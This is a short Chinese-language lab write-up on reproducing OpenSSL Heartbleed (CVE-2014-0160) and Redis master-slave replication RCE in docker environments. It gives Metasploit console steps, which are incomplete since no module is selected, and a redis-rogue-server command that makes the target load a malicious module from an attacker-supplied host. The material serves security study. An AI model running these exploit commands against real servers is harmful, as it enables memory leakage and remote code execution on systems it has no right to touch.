OpenSSL
OpenSSL 心脏滴血漏洞 CVE-2014-0160
漏洞描述
2014年4月7日,OpenSSL
发布安全公告,在OpenSSL 1.0.1 ~ 1.0.1f Beta1
版本中存在漏洞,漏洞名为HeartBleed
。其中Heart
是指该漏洞位于心跳协议上,Bleed
是因为该漏洞会造成数据泄露。即HeartBleed
是在心跳协议上的一个数据泄露漏洞,OpenSSL
库中用到了该心跳协议。
影响版本
OpenSSL 1.0.1
、1.0.1a
、1.0.1b
、1.0.1c
、1.0.1d
、1.0.1e
、1.0.1f
、Beta 1 of OpenSSL 1.0.2
等。
复现思路
漏洞复现
环境搭建:
git clone https://github.com/vulhub/vulhub.git
cd vulhub/openssl/heartbleed
docker-compose up -d
使用msf
对目标进行攻击:
msfconsole
set RHOST <ip>
set verbose true
run
Redis
Redis 主从复制RCE
漏洞描述
在2019年7月7日结束的WCTF2019 Final
上,LC/BC
成员Pavel Toporkov
在分享会上介绍了一种关于Redis
新版本的RCE
利用方式,比起以前的利用方式来说,这种利用方式更为通用,危害也更大。
Pavel Toporkov
的分享:
15-redis-post-exploitation.pdf (zeronights.ru)
影响版本
Redis <= 5.0.5
复现思路
漏洞复现
环境搭建:
docker pull a1143535418/redis5.0
docker run -p 6379:6379 -d a1143535418/redis5.0 redis-server
利用脚本:
n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE (github.com)
python3 redis-rogue-server.py --rhost <remote-ip> --lhost <local-ip> --exp=exp.so
文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。